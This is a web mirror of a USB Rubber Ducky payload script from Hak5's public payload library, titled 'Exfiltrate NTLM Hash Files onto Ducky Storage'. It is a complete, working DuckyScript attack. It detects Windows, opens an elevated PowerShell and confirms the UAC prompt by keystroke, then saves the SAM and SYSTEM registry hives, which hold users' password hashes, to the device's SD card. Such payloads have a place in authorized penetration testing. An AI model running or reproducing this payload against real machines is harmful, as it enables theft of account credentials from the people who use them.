Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/NTLM_ducky/payload.txt
2968 views
1
REM_BLOCK

2
TITLE           Exfiltrate NTLM Hash Files onto Ducky Storage

3
AUTHOR          Luu176

4
DESCRIPTION     This payload exfiltrates NTLM hash files (which contain hashed passwords for users 

5
                on the current Windows device) to the Rubber Ducky's SD card for further analysis. 

6
                It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to 

7
                the defined storage drive on the Ducky device.

8
END_REM

9


10
DEFINE #driveLabel DUCKY

11
REM below you can set the number of blinks for the caps lock when finished (default 9)

12
DEFINE #numBlinks 9

13


14
ATTACKMODE HID STORAGE

15


16
EXTENSION PASSIVE_WINDOWS_DETECT

17
    REM VERSION 1.1

18
    REM AUTHOR: Korben

19


20
    REM_BLOCK DOCUMENTATION

21
        Windows fully passive OS Detection and passive Detect Ready

22
        Includes its own passive detect ready.

23
        Does not require additional extensions.

24


25
        USAGE:

26
            Extension runs inline (here)

27
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic

28
            boot delay

29
            $_OS will be set to WINDOWS or NOT_WINDOWS

30
            See end of payload for usage within payload

31
    END_REM

32


33
    REM CONFIGURATION:

34
    DEFINE #MAX_WAIT 150

35
    DEFINE #CHECK_INTERVAL 20

36
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

37
    DEFINE #NOT_WINDOWS 7

38


39
    $_OS = #NOT_WINDOWS

40


41
    VAR $MAX_TRIES = #MAX_WAIT

42
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

43
        DELAY #CHECK_INTERVAL

44
        $MAX_TRIES = ($MAX_TRIES - 1)

45
    END_WHILE

46
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

47
        $_OS = WINDOWS

48
    END_IF

49


50
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION

51
        IF ($_OS == WINDOWS) THEN

52
            STRING HELLO WINDOWS!

53
        ELSE

54
            STRING HELLO WORLD!

55
        END_IF

56
    END_REM

57
END_EXTENSION

58


59
SAVE_HOST_KEYBOARD_LOCK_STATE

60
IF ($_CAPSLOCK_ON == TRUE)

61
    CAPSLOCK

62
END_IF

63
GUI d

64
DELAY 1000

65
GUI r

66
DELAY 500

67
STRINGLN powershell Start-Process powershell -Verb runAs

68
DELAY 800

69
ALT y

70
DELAY 800

71
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit

72
GUI d

73
WAIT_FOR_CAPS_ON 

74
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)

75
VAR $i = 0

76
WHILE ( $i < #numBlinks )

77
    DELAY 150

78
    CAPSLOCK

79
    $i = ( $i + 1 )

80
END_WHILE

81
RESTORE_HOST_KEYBOARD_LOCK_STATE

82


83